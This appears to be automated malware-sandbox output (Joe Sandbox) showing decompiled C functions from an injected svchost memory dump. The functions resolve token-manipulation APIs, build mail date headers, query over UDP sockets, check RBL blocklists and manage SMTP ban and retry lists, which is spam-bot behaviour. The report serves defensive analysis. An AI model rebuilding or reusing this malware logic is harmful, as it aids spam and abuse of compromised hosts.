GetProcAddress.KERNEL32(00000000,RtlFreeSid), ref: 00321121
GetProcAddress.KERNEL32(00000000,RtlInitUnicodeString), ref: 00321140
GetProcAddress.KERNEL32(00000000,NtSetInformationThread), ref: 00321160
GetProcAddress.KERNEL32(00000000,NtSetInformationToken), ref: 00321180
GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 0032119F
GetProcAddress.KERNEL32(00000000,NtClose), ref: 003211BF
GetProcAddress.KERNEL32(00000000,NtOpenProcessToken), ref: 003211DF
GetProcAddress.KERNEL32(00000000,NtDuplicateToken), ref: 003211FE
GetProcAddress.KERNEL32(00000000,RtlAllocateAndInitializeSid), ref: 0032121A

Strings

RtlNtStatusToDosError, xrefs: 00321194
RtlSetLastWin32Error, xrefs: 003210D6
NtDuplicateToken, xrefs: 003211F3
NtTerminateProcess, xrefs: 003210F6
RtlAllocateAndInitializeSid, xrefs: 0032120F
NtOpenProcessToken, xrefs: 003211D4
NtSetInformationToken, xrefs: 00321175
NtSetInformationThread, xrefs: 00321155
RtlInitUnicodeString, xrefs: 00321135
NtQueryInformationToken, xrefs: 00321262
RtlLengthSid, xrefs: 00321246
RtlFreeSid, xrefs: 00321116
RtlExpandEnvironmentStrings_U, xrefs: 003210BC
ntdll.dll, xrefs: 0032100D
NtFilterToken, xrefs: 0032122B
NtClose, xrefs: 003211B4

Memory Dump Source

Source File: 00000027.00000002.922686278.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_320000_svchost.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: NtClose$NtDuplicateToken$NtFilterToken$NtOpenProcessToken$NtQueryInformationToken$NtSetInformationThread$NtSetInformationToken$NtTerminateProcess$RtlAllocateAndInitializeSid$RtlExpandEnvironmentStrings_U$RtlFreeSid$RtlInitUnicodeString$RtlLengthSid$RtlNtStatusToDosError$RtlSetLastWin32Error$ntdll.dll
API String ID: 2238633743-3228201535
Opcode ID: 6f71d5d9e236c7165d82c68bf8d78d7dcac9e0f8c86577e3f9ef84200d74250b
Instruction ID: 44d73dbd94031e64bc8ba8a9f41a1d525a3caa477715ba3162319c81c7900fb6
Opcode Fuzzy Hash: 6f71d5d9e236c7165d82c68bf8d78d7dcac9e0f8c86577e3f9ef84200d74250b
Instruction Fuzzy Hash: AE515C72A46A12EAD7238B68BDC079637BC6758325F168356E420D22F0D7F4CAC2CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0032B211, Relevance: 47.4, APIs: 7, Strings: 20, Instructions: 131
timeCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E0032B211(FILETIME* _a4, CHAR* _a8, signed int _a12) {
				struct _FILETIME _v12;
				struct _SYSTEMTIME _v28;
				CHAR* _v32;
				CHAR* _v36;
				CHAR* _v40;
				CHAR* _v44;
				CHAR* _v48;
				CHAR* _v52;
				CHAR* _v56;
				CHAR* _v60;
				CHAR* _v64;
				CHAR* _v68;
				CHAR* _v72;
				CHAR* _v76;
				CHAR* _v80;
				CHAR* _v84;
				CHAR* _v88;
				CHAR* _v92;
				CHAR* _v96;
				CHAR* _v100;
				CHAR* _v104;
				struct _TIME_ZONE_INFORMATION _v276;
				long _t77;
				signed int _t80;
				signed int _t93;
				signed int _t101;
				signed int _t102;
				CHAR* _t103;
				signed int _t104;
				signed short _t106;
				signed short _t109;
				signed int _t114;
				signed int _t115;
				void* _t117;

				_v56 = "Sun";
				_v52 = "Mon";
				_v48 = "Tue";
				_v44 = "Wed";
				_v40 = "Thu";
				_v36 = "Fri";
				_v32 = "Sat";
				_v104 = "Jan";
				_v100 = "Feb";
				_v96 = "Mar";
				_v92 = "Apr";
				_v88 = "May";
				_v84 = "Jun";
				_v80 = "Jul";
				_v76 = "Aug";
				_v72 = "Sep";
				_v68 = "Oct";
				_v64 = "Nov";
				_v60 = "Dec";
				if(_a4 != 0) {
					FileTimeToLocalFileTime(_a4,  &_v12);
					FileTimeToSystemTime( &_v12,  &_v28);
				} else {
					GetLocalTime( &_v28);
				}
				_t114 = _a12;
				if(_t114 != 0) {
					SystemTimeToFileTime( &_v28,  &_v12);
					_t93 = E0032ECA5();
					if(_t114 <= 0) {
						_t104 = _t93 %  ~_t114 * 0x23c34600;
						_v12.dwLowDateTime = _v12.dwLowDateTime - _t104;
						asm("sbb [ebp-0x4], ebx");
					} else {
						_t104 = _t93 % _t114 * 0x23c34600;
						_v12.dwLowDateTime = _v12.dwLowDateTime + _t104;
						asm("adc [ebp-0x4], ebx");
					}
					FileTimeToSystemTime( &_v12,  &_v28);
				}
				_v276.Bias = 0;
				_t77 = GetTimeZoneInformation( &_v276);
				_t101 = _v276.Bias;
				if(_t77 == 2) {
					_t101 = _t101 + _v276.DaylightBias;
				}
				_t102 =  ~_t101;
				asm("cdq");
				_t80 = (_t102 ^ _t104) - _t104;
				if(_v28.wDayOfWeek > 6) {
					_t109 = 6;
					_v28.wDayOfWeek = _t109;
				}
				if(_v28.wMonth == 0) {
					_v28.wMonth = 1;
				}
				if(_v28.wMonth > 0xc) {
					_t106 = 0xc;
					_v28.wMonth = _t106;
				}
				_t103 = "+";
				if(_t102 < 0) {
					_t103 = "-";
				}
				_t115 = 0x3c;
				asm("cdq");
				return wsprintfA(_a8, "%s, %u %s %u %.2u:%.2u:%.2u %s%.2u%.2u",  *((intOrPtr*)(_t117 + (_v28.wDayOfWeek & 0x0000ffff) * 4 - 0x34)), _v28.wDay & 0x0000ffff,  *((intOrPtr*)(_t117 + (_v28.wMonth & 0x0000ffff) * 4 - 0x68)), _v28.wYear & 0x0000ffff, _v28.wHour & 0x0000ffff, _v28.wMinute & 0x0000ffff, _v28.wSecond & 0x0000ffff, _t103, _t80 / _t115, _t80 % _t115);
			}

0x0032b225
0x0032b22c
0x0032b233
0x0032b23a
0x0032b241
0x0032b248
0x0032b24f
0x0032b256
0x0032b25d
0x0032b264
0x0032b26b
0x0032b272
0x0032b279
0x0032b280
0x0032b287
0x0032b28e
0x0032b295
0x0032b29c
0x0032b2a3
0x0032b2ad
0x0032b2c2
0x0032b2d0
0x0032b2af
0x0032b2b3
0x0032b2b3
0x0032b2d2
0x0032b2d7
0x0032b2e1
0x0032b2e7
0x0032b2f0
0x0032b306
0x0032b30c
0x0032b30f
0x0032b2f2
0x0032b2f4
0x0032b2fa
0x0032b2fd
0x0032b2fd
0x0032b31a
0x0032b31a
0x0032b323
0x0032b329
0x0032b32f
0x0032b338
0x0032b33a
0x0032b33a
0x0032b33d
0x0032b341
0x0032b344
0x0032b34b
0x0032b34f
0x0032b350
0x0032b350
0x0032b358
0x0032b35d
0x0032b35d
0x0032b366
0x0032b36a
0x0032b36b
0x0032b36b
0x0032b371
0x0032b376
0x0032b378
0x0032b378
0x0032b37f
0x0032b380
0x0032b3c4

APIs

GetLocalTime.KERNEL32(?), ref: 0032B2B3
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0032B2C2
FileTimeToSystemTime.KERNEL32(?,?), ref: 0032B2D0
SystemTimeToFileTime.KERNEL32(?,?), ref: 0032B2E1
FileTimeToSystemTime.KERNEL32(?,?), ref: 0032B31A
GetTimeZoneInformation.KERNEL32(?), ref: 0032B329
wsprintfA.USER32 ref: 0032B3B7

Strings

Wed, xrefs: 0032B23A
Feb, xrefs: 0032B25D
Oct, xrefs: 0032B295
Mon, xrefs: 0032B22C
Apr, xrefs: 0032B26B
Thu, xrefs: 0032B241
Sat, xrefs: 0032B24F
Jun, xrefs: 0032B279
Aug, xrefs: 0032B287
Jul, xrefs: 0032B280
Jan, xrefs: 0032B256
Nov, xrefs: 0032B29C
Sun, xrefs: 0032B225
May, xrefs: 0032B272
Sep, xrefs: 0032B28E
Dec, xrefs: 0032B2A3
Fri, xrefs: 0032B248
Tue, xrefs: 0032B233
%s, %u %s %u %.2u:%.2u:%.2u %s%.2u%.2u, xrefs: 0032B3AF
Mar, xrefs: 0032B264

Memory Dump Source

Source File: 00000027.00000002.922686278.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_320000_svchost.jbxd

Yara matches

Similarity

API ID: Time$File$System$Local$InformationZonewsprintf
String ID: %s, %u %s %u %.2u:%.2u:%.2u %s%.2u%.2u$Apr$Aug$Dec$Feb$Fri$Jan$Jul$Jun$Mar$May$Mon$Nov$Oct$Sat$Sep$Sun$Thu$Tue$Wed
API String ID: 766114626-2976066047
Opcode ID: a209447c1defb04353d70705cfcd9ca72d3d0fc3eeea1ebe7153acd8b68b5d06
Instruction ID: b88ad00c7685b6fc9e0ff28120cbd77db94cacd0cc72cb96eab7663f2b83e746
Opcode Fuzzy Hash: a209447c1defb04353d70705cfcd9ca72d3d0fc3eeea1ebe7153acd8b68b5d06
Instruction Fuzzy Hash: 05513BB9D0022CABCF1ADFD5D8D58EEBBB9FF48304F145529E601BA150D3B44A89CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00322A62, Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 194
networkmemoryCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E00322A62(void* __ecx, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr* _v44;
				signed short _v272;
				char _v276;
				long _v280;
				char _v284;
				signed short _v288;
				signed short _v292;
				long _v300;
				long _v304;
				intOrPtr _v308;
				signed short _v324;
				intOrPtr _v332;
				signed short _v336;
				signed int _v340;
				signed int _v344;
				void* _v348;
				signed short _v352;
				signed short _v356;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t53;
				signed short _t66;
				void** _t71;
				void* _t76;
				void* _t77;
				void* _t78;
				signed short _t79;
				intOrPtr* _t81;
				signed short _t82;
				signed short _t83;
				intOrPtr _t86;
				signed int _t88;
				void* _t90;
				long _t91;
				signed short _t92;
				void* _t94;

				_t77 = __ecx;
				_t91 = 0;
				 *_a12 = 1;
				_t50 = HeapAlloc(GetProcessHeap(), 0, 0x1000);
				_t76 = _t50;
				if(_t76 != 0) {
					__imp__#23(2, 2, 0x11, _t78);
					_t79 = _t50;
					_v288 = _t79;
					if(_t79 == 0 || _t79 == 0xffffffff) {
						HeapFree(GetProcessHeap(), _t91, _t76);
						_t53 = 0;
						goto L37;
					} else {
						_v304 = 0;
						while(1) {
							_v300 = _t91;
							if(_v304 != _t91) {
								_push(_t91);
							} else {
								_push(0x100);
							}
							__imp__#9();
							_t50 = E003226FF(_v8, _t79, _v12, _t50 & 0x0000ffff);
							_t94 = _t94 + 0xc;
							if(_t50 != 0) {
								goto L32;
							}
							_t86 = 0xc;
							_t50 =  &_v276;
							_v272 = _t79;
							_v276 = 1;
							_v284 = _t86;
							_v280 = _t91;
							__imp__#18(_t91, _t50, _t91, _t91,  &_v284);
							if(_t50 <= 0) {
								goto L32;
							}
							_t50 = E0032EE2A(_t77, _t76, _t91, 4);
							_t94 = _t94 + 0xc;
							__imp__#16(_t79, _t76, 0x1000, _t91);
							_t92 = _t50;
							_v324 = _t92;
							if(_t92 > 0 && _t92 > _t86) {
								_t81 = __imp__#15;
								_t88 =  *_t81( *(_t76 + 2) & 0x0000ffff) & 0xf;
								if(_t88 == 3) {
									L34:
									 *_v44 = 2;
									L35:
									HeapFree(GetProcessHeap(), 0, _t76);
									__imp__#3(_v292);
									_t53 = _v308;
									L37:
									return _t53;
								}
								if(_t88 != 2) {
									L16:
									if(_t88 != 0) {
										goto L32;
									}
									_t50 = E00322923(_t77, _t76, _t92);
									_pop(_t77);
									_v336 = _t50;
									if(_t50 == 0) {
										goto L32;
									}
									_v340 = _v340 & 0x00000000;
									_v344 = _v344 & 0x00000000;
									_t82 = _t50;
									_v352 = _t82;
									L20:
									while(1) {
										if( *((short*)(_t82 + 0x10a)) != 1 ||  *((short*)(_t82 + 0x108)) != 0xf ||  *((short*)(_t82 + 0x10c)) < 3) {
											L30:
											_t83 =  *_t82;
											_v352 = _t83;
											if(_t83 != 0) {
												_t82 = _v352;
												continue;
											}
											goto L31;
										} else {
											_t90 = HeapAlloc(GetProcessHeap(), 0, 0x108);
											if(_t90 == 0) {
												L31:
												_t50 = E00322904(_v336);
												if(_v344 != 0) {
													goto L35;
												}
												goto L32;
											}
											E0032EE2A(_t77, _t90, 0, 0x108);
											_t66 =  *( *((intOrPtr*)(_t82 + 0x110)) + _t76) & 0x0000ffff;
											_t94 = _t94 + 0xc;
											__imp__#15();
											 *(_t90 + 4) = _t66 & 0x0000ffff;
											_t33 = _t90 + 8; // 0x8
											E00322871( *((intOrPtr*)(_t82 + 0x110)) + 2, _t76, _t77, _t33, _v332);
											_t77 = _t66;
											if( *((char*)(_t90 + 8)) != 0) {
												_t71 = _v344;
												_v344 = _t90;
												if(_t71 != 0) {
													 *_t71 = _t90;
												} else {
													_v348 = _t90;
												}
											} else {
												HeapFree(GetProcessHeap(), 0, _t90);
											}
											_t82 = _v356;
											goto L30;
										}
									}
								}
								_push( *(_t76 + 2) & 0x0000ffff);
								if( *_t81() < 0) {
									goto L34;
								}
								goto L16;
							}
							L32:
							_v308 = _v308 + 1;
							if(_v308 < 2) {
								_t79 = _v292;
								_t91 = 0;
								continue;
							}
							goto L35;
						}
					}
				}
				return 0;
			}

0x00322a62
0x00322a7a
0x00322a7d
0x00322a86
0x00322a8c
0x00322a90
0x00322aa0
0x00322aa6
0x00322aa8
0x00322aae
0x00322cd8
0x00322cde
0x00000000
0x00322abd
0x00322abd
0x00322ac9
0x00322ac9
0x00322ad1
0x00322ada
0x00322ad3
0x00322ad3
0x00322ad3
0x00322adb
0x00322af4
0x00322af9
0x00322afe
0x00000000
0x00000000
0x00322b06
0x00322b0e
0x00322b14
0x00322b18
0x00322b20
0x00322b24
0x00322b28
0x00322b30
0x00000000
0x00000000
0x00322b3a
0x00322b3f
0x00322b4a
0x00322b50
0x00322b52
0x00322b58
0x00322b6a
0x00322b76
0x00322b7c
0x00322ca6
0x00322cad
0x00322cb3
0x00322cbd
0x00322cc7
0x00322ccd
0x00322ce0
0x00000000
0x00322ce0
0x00322b85
0x00322b96
0x00322b98
0x00000000
0x00000000
0x00322ba1
0x00322ba6
0x00322ba7
0x00322bad
0x00000000
0x00000000
0x00322bb3
0x00322bb8
0x00322bbd
0x00322bbf
0x00000000
0x00322bc9
0x00322bd1
0x00322c77
0x00322c77
0x00322c79
0x00322c7f
0x00322bc5
0x00000000
0x00322bc5
0x00000000
0x00322bf3
0x00322c08
0x00322c0c
0x00322c85
0x00322c89
0x00322c93
0x00000000
0x00000000
0x00000000
0x00322c93
0x00322c12
0x00322c1d
0x00322c21
0x00322c25
0x00322c32
0x00322c3e
0x00322c41
0x00322c4a
0x00322c4b
0x00322c5f
0x00322c63
0x00322c69
0x00322c71
0x00322c6b
0x00322c6b
0x00322c6b
0x00322c4d
0x00322c57
0x00322c57
0x00322c73
0x00000000
0x00322c73
0x00322bd1
0x00322bc9
0x00322b8b
0x00322b90
0x00000000
0x00000000
0x00000000
0x00322b90
0x00322c95
0x00322c95
0x00322c9e
0x00322ac3
0x00322ac7
0x00000000
0x00322ac7
0x00000000
0x00322ca4
0x00322ac9
0x00322aae
0x00000000

APIs

GetProcessHeap.KERNEL32(00000000,00001000,00000000,?,73B74F20), ref: 00322A83
HeapAlloc.KERNEL32(00000000,?,73B74F20), ref: 00322A86
socket.WS2_32(00000002,00000002,00000011), ref: 00322AA0
htons.WS2_32(00000000), ref: 00322ADB
select.WS2_32 ref: 00322B28
recv.WS2_32(?,00000000,00001000,00000000), ref: 00322B4A
htons.WS2_32(?), ref: 00322B71
htons.WS2_32(?), ref: 00322B8C
GetProcessHeap.KERNEL32(00000000,00000108), ref: 00322BFB

Strings

ps, xrefs: 00322CC7

Memory Dump Source

Source File: 00000027.00000002.922686278.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_320000_svchost.jbxd

Yara matches

Similarity

API ID: Heaphtons$Process$Allocrecvselectsocket
String ID: ps
API String ID: 1639031587-3878219058
Opcode ID: f5c3be3f13f671437ebad0291974ab99e6f589e0fb807efa82b030b620737405
Instruction ID: 99794e83ed5bd56b9f90e534274a419bb4c898658b14b238cb582ce5fef3aec0
Opcode Fuzzy Hash: f5c3be3f13f671437ebad0291974ab99e6f589e0fb807efa82b030b620737405
Instruction Fuzzy Hash: 3B61D3B1904335AFC7229F65EC48B6FBBECFB88751F020819F9459B250D7B4D8408BA2

Uniqueness

Uniqueness Score: -1.00%

Function 00322011, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 160
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E00322011() {
				long _t35;
				void* _t45;
				intOrPtr _t47;
				void* _t51;
				char* _t53;
				char* _t58;
				intOrPtr _t96;
				signed int _t102;
				signed int _t103;
				void* _t104;
				void* _t122;

				if(( *0x3322f4 & 0x00000001) == 0) {
					 *0x3322f4 =  *0x3322f4 | 0x00000001;
					 *0x3322f0 = E0032F04E(0);
				}
				if(( *0x3322f4 & 0x00000002) == 0) {
					 *0x3322f4 =  *0x3322f4 | 0x00000002;
					 *0x3322ec = E0032F04E(0);
				}
				if(( *0x3322f4 & 0x00000004) == 0) {
					 *0x3322f4 =  *0x3322f4 | 0x00000004;
					 *0x3322e8 = E0032F04E(0);
				}
				_t35 = GetTickCount();
				_t96 =  *((intOrPtr*)(_t104 + 0x114));
				if(_t35 -  *0x3322e0 > 0xdbba0) {
					_t58 =  *0x332000; // 0x330288
					_t103 = 0;
					if( *_t58 != 0) {
						_t60 = 0x332000;
						do {
							if(E00322684( *_t60) == 0) {
								goto L11;
							} else {
								 *(_t96 + 0x14) =  *(_t96 + 0x14) | 0x00000004;
								if(E00321978(_t61, 0x50) != 0) {
									_t12 = _t96 + 0x14;
									 *_t12 =  *(_t96 + 0x14) | 0x00000002;
									__eflags =  *_t12;
								} else {
									goto L11;
								}
							}
							goto L14;
							L11:
							_t103 = _t103 + 1;
							_t60 = 0x332000 + _t103 * 4;
						} while ( *((char*)( *(0x332000 + _t103 * 4))) != 0);
					}
					L14:
					 *0x3322e0 = GetTickCount();
				}
				if(GetTickCount() -  *0x3322dc > 0xdbba0) {
					_t53 =  *0x332000; // 0x330288
					_t102 = 0;
					if( *_t53 != 0) {
						_t55 = 0x332000;
						do {
							if(E00322EF8( *_t55) == 0) {
								goto L20;
							} else {
								 *(_t96 + 0x14) =  *(_t96 + 0x14) | 0x00000008;
								if(E00321978(_t56, 0x19) != 0) {
									_t18 = _t96 + 0x14;
									 *_t18 =  *(_t96 + 0x14) | 0x00000001;
									__eflags =  *_t18;
								} else {
									goto L20;
								}
							}
							goto L23;
							L20:
							_t102 = _t102 + 1;
							_t55 = 0x332000 + _t102 * 4;
						} while ( *((char*)( *(0x332000 + _t102 * 4))) != 0);
					}
					L23:
					 *0x3322dc = GetTickCount();
				}
				 *(_t96 + 0x28) = GetTickCount() / 0x3e8;
				 *((intOrPtr*)(_t96 + 0x2c)) = GetTickCount() / 0x3e8 -  *0x332110;
				_t45 = E0032F04E(0) -  *0x3322f0;
				_t93 = "localcfg";
				_t122 = _t45 -  *0x3322e4; // 0x12c
				if(_t122 > 0) {
					E0032E854(1, "localcfg", "rbl_bl", _t104 + 0x18, 0x100, 0x330264);
					_t51 = E0032E819(1, _t93, "rbl_ip", 0);
					_t104 = _t104 + 0x28;
					if(_t51 == 0) {
						L28:
						 *0x3322e4 = 0x12c;
					} else {
						_t124 =  *((intOrPtr*)(_t104 + 0x10));
						if( *((intOrPtr*)(_t104 + 0x10)) == 0) {
							goto L28;
						} else {
							_push(_t104 + 0x10);
							_push(_t51);
							 *((intOrPtr*)(_t96 + 0x38)) = E00321C5F(_t124);
							 *0x3322e4 = 0x4b0;
						}
					}
				}
				_t47 = E0032F04E(0) -  *0x3322f0;
				if(_t47 > 0x4b0) {
					E0032EA84(1, _t93, "net_type",  *(_t96 + 0x14));
					_t47 = E0032F04E(0);
					 *0x3322f0 = _t47;
				}
				return _t47;
			}

0x0032201e
0x00322020
0x0032202f
0x0032202f
0x0032203b
0x0032203d
0x0032204c
0x0032204c
0x00322058
0x0032205a
0x00322069
0x00322069
0x00322078
0x00322080
0x0032208e
0x00322090
0x00322095
0x0032209a
0x0032209c
0x003220a1
0x003220ab
0x00000000
0x003220ad
0x003220ad
0x003220bd
0x003220d0
0x003220d0
0x003220d0
0x00000000
0x00000000
0x00000000
0x003220bd
0x00000000
0x003220bf
0x003220bf
0x003220c0
0x003220c9
0x003220ce
0x003220d4
0x003220d6
0x003220d6
0x003220e5
0x003220e7
0x003220ec
0x003220f1
0x003220f3
0x003220f8
0x00322102
0x00000000
0x00322104
0x00322104
0x00322114
0x00322127
0x00322127
0x00322127
0x00000000
0x00000000
0x00000000
0x00322114
0x00000000
0x00322116
0x00322116
0x00322117
0x00322120
0x00322125
0x0032212b
0x0032212d
0x0032212d
0x0032213f
0x00322151
0x00322159
0x00322160
0x0032216a
0x00322170
0x00322189
0x00322197
0x0032219c
0x003221a1
0x003221c1
0x003221c1
0x003221a3
0x003221a3
0x003221a7
0x00000000
0x003221a9
0x003221ad
0x003221ae
0x003221b6
0x003221b9
0x003221b9
0x003221a7
0x003221a1
0x003221d1
0x003221da
0x003221e7
0x003221ed
0x003221f5
0x003221f5
0x00322204

APIs

GetTickCount.KERNEL32 ref: 00322078
GetTickCount.KERNEL32 ref: 003220D4
GetTickCount.KERNEL32 ref: 003220DB
GetTickCount.KERNEL32 ref: 0032212B
GetTickCount.KERNEL32 ref: 00322132
GetTickCount.KERNEL32 ref: 00322142

Part of subcall function 0032F04E: SystemTimeToFileTime.KERNEL32(?,00000000,?,?,?,0032E342,00000000,73AFF210,80000001,00000000,0032E513,?,00000000,00000000,?,000000E4), ref: 0032F089
Part of subcall function 0032F04E: GetSystemTimeAsFileTime.KERNEL32(80000001,?,?,?,0032E342,00000000,73AFF210,80000001,00000000,0032E513,?,00000000,00000000,?,000000E4,000000C8), ref: 0032F093

Part of subcall function 0032E854: lstrcpyA.KERNEL32(00000001,?,?,0032D8DF,00000001,localcfg,except_info,00100000,00330264), ref: 0032E88B
Part of subcall function 0032E854: lstrlenA.KERNEL32(00000001,?,0032D8DF,00000001,localcfg,except_info,00100000,00330264), ref: 0032E899

Part of subcall function 00321C5F: wsprintfA.USER32 ref: 00321CE1

Strings

rbl_ip, xrefs: 0032218F
localcfg, xrefs: 00322070, 00322160, 00322186, 00322194, 003221E4
net_type, xrefs: 003221DF
rbl_bl, xrefs: 00322181

Memory Dump Source

Source File: 00000027.00000002.922686278.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_320000_svchost.jbxd

Yara matches

Similarity

API ID: CountTick$Time$FileSystem$lstrcpylstrlenwsprintf
String ID: localcfg$net_type$rbl_bl$rbl_ip
API String ID: 3976553417-1522128867
Opcode ID: 47682feccf23f208b2c3ff9e0ae924b1b7bd32a80609fae482cf0b4b5ae8c69f
Instruction ID: 03739257aee441abe0e15647732d23d6aeeb9750eda29cc0d54de36d97738fe8
Opcode Fuzzy Hash: 47682feccf23f208b2c3ff9e0ae924b1b7bd32a80609fae482cf0b4b5ae8c69f
Instruction Fuzzy Hash: 4751D2719043566EE72BEF34FDC6B673BE8AB04314F114929E641CA1B1DBB4A848CB11

Uniqueness

Uniqueness Score: -1.00%

Function 0032BE31, Relevance: 13.7, APIs: 6, Strings: 3, Instructions: 152
stringCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E0032BE31(signed int _a4, intOrPtr _a8) {
				signed int _v8;
				CHAR* _v12;
				int _v16;
				int _t50;
				int _t51;
				intOrPtr _t52;
				intOrPtr _t55;
				intOrPtr _t57;
				void* _t59;
				char* _t66;
				CHAR* _t68;
				int _t71;
				int _t72;
				void* _t76;
				intOrPtr _t78;
				signed int _t82;
				signed int _t83;
				signed int _t84;
				intOrPtr* _t86;
				void* _t88;
				void* _t91;
				void* _t92;

				_t83 = _a4;
				_t68 = _t83 + 4;
				_v12 = _t68;
				if(lstrcmpiA(_t68, "smtp_herr") == 0 || lstrcmpiA(_t68, "smtp_ban") == 0) {
					L3:
					_t72 = 0;
					_v16 = 0;
					if(_a8 == 3) {
						L25:
						if(lstrcmpiA(_v12, "smtp_herr") != 0) {
							if(lstrcmpiA(_v12, "smtp_ban") != 0) {
								_t50 = lstrcmpiA(_v12, "smtp_retr");
								_t51 = 0x333638;
								if(_t50 != 0) {
									_t51 = _a4;
								}
							} else {
								_t51 = 0x333634;
							}
						} else {
							_t51 = 0x333630;
						}
						_t86 =  *_t51;
						 *_t51 = _v16;
						if(_t86 == 0) {
							goto L36;
						} else {
							_t52 =  *_t86;
							_t84 = 0;
							while(_t52 != 0) {
								E0032EC2E(_t52);
								_t84 = _t84 + 1;
								_t52 =  *((intOrPtr*)(_t86 + _t84 * 4));
							}
							return E0032EC2E(_t86);
						}
					}
					_t55 =  *((intOrPtr*)(_t83 + 0x18));
					_t82 = 0;
					if(_t55 <= 0) {
						goto L25;
					} else {
						goto L5;
					}
					do {
						L5:
						if( *((char*)(_t83 + _t72 + 0x24)) == 0xa || _t72 == _t55 - 1) {
							_t82 = _t82 + 1;
						}
						_t72 = _t72 + 1;
					} while (_t72 < _t55);
					if(_t82 == 0) {
						goto L25;
					}
					_t70 = 4 + _t82 * 4;
					_t51 = E0032EBCC(4 + _t82 * 4);
					_pop(_t76);
					_v16 = _t51;
					if(_t51 == 0) {
						goto L36;
					}
					E0032EE2A(_t76, _t51, 0, _t70);
					_t57 =  *((intOrPtr*)(_t83 + 0x18));
					_v8 = _v8 & 0x00000000;
					_a4 = _a4 & 0x00000000;
					_t92 = _t91 + 0xc;
					if(_t57 > 0) {
						_t71 = _v16;
						do {
							_t78 =  *((intOrPtr*)(_t83 + _a4 + 0x24));
							if(_t78 == 0xa || _a4 == _t57 - 1) {
								_t88 = _a4 - _v8;
								if(_t78 != 0xa) {
									_t88 = _t88 + 1;
								}
								_t25 = _t88 + 1; // 0x1
								_t59 = E0032EBCC(_t25);
								 *_t71 = _t59;
								if(_t59 == 0) {
									goto L25;
								} else {
									E0032EE08(_t59, _t83 + _v8 + 0x24, _t88);
									_t92 = _t92 + 0xc;
									 *((char*)(_t88 +  *_t71)) = 0;
									if(_t88 > 0) {
										_t31 =  *_t71 - 1; // -1
										_t66 = _t88 + _t31;
										if( *_t66 == 0xd) {
											 *_t66 = 0;
										}
									}
									_t71 = _t71 + 4;
									_v8 = _v8 + _t88 + 1;
									goto L22;
								}
							}
							L22:
							_a4 = _a4 + 1;
							_t57 =  *((intOrPtr*)(_t83 + 0x18));
						} while (_a4 < _t57);
					}
					goto L25;
				} else {
					_t51 = lstrcmpiA(_t68, "smtp_retr");
					if(_t51 != 0) {
						L36:
						return _t51;
					}
					goto L3;
				}
			}

0x0032be40
0x0032be43
0x0032be4c
0x0032be53
0x0032be71
0x0032be71
0x0032be77
0x0032be7a
0x0032bf62
0x0032bf6e
0x0032bf83
0x0032bf94
0x0032bf98
0x0032bf9d
0x0032bf9f
0x0032bf9f
0x0032bf85
0x0032bf85
0x0032bf85
0x0032bf70
0x0032bf70
0x0032bf70
0x0032bfa2
0x0032bfa7
0x0032bfab
0x00000000
0x0032bfad
0x0032bfad
0x0032bfaf
0x0032bfbe
0x0032bfb4
0x0032bfb9
0x0032bfba
0x0032bfbd
0x00000000
0x0032bfc8
0x0032bfab
0x0032be80
0x0032be83
0x0032be87
0x00000000
0x00000000
0x00000000
0x00000000
0x0032be8d
0x0032be8d
0x0032be92
0x0032be9b
0x0032be9b
0x0032be9c
0x0032be9d
0x0032bea3
0x00000000
0x00000000
0x0032bea9
0x0032beb1
0x0032beb6
0x0032beb7
0x0032bebc
0x00000000
0x00000000
0x0032bec6
0x0032becb
0x0032bece
0x0032bed2
0x0032bed6
0x0032bedb
0x0032bee1
0x0032bee4
0x0032bee7
0x0032beee
0x0032bef9
0x0032beff
0x0032bf01
0x0032bf01
0x0032bf02
0x0032bf06
0x0032bf0c
0x0032bf10
0x00000000
0x0032bf12
0x0032bf1c
0x0032bf23
0x0032bf26
0x0032bf2c
0x0032bf30
0x0032bf30
0x0032bf37
0x0032bf39
0x0032bf39
0x0032bf37
0x0032bf49
0x0032bf4c
0x00000000
0x0032bf4c
0x0032bf10
0x0032bf4f
0x0032bf4f
0x0032bf52
0x0032bf55
0x0032bf5a
0x00000000
0x0032be61
0x0032be67
0x0032be6b
0x0032bfcd
0x0032bfcd
0x0032bfcd
0x00000000
0x0032be6b

APIs

lstrcmpiA.KERNEL32(?,smtp_herr), ref: 0032BE4F
lstrcmpiA.KERNEL32(?,smtp_ban), ref: 0032BE5B
lstrcmpiA.KERNEL32(?,smtp_retr), ref: 0032BE67
lstrcmpiA.KERNEL32(?,smtp_herr), ref: 0032BF6A
lstrcmpiA.KERNEL32(?,smtp_ban), ref: 0032BF7F
lstrcmpiA.KERNEL32(?,smtp_retr), ref: 0032BF94

Strings

smtp_ban, xrefs: 0032BE55, 0032BF77
smtp_retr, xrefs: 0032BE61, 0032BF8C
smtp_herr, xrefs: 0032BE46, 0032BF62

Memory Dump Source

Source File: 00000027.00000002.922686278.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_320000_svchost.jbxd

Yara matches

Similarity

API ID: lstrcmpi
String ID: smtp_ban$smtp_herr$smtp_retr
API String ID: 1586166983-1625972887
Opcode ID: 31ad5a6bbd0f38766327acec72db81d4e7f540d6d431a429b70071babb52397f
Instruction ID: abcc1558ad2bfb3d19153ba868772f09a245c123dc7036f3963f98621624d3eb
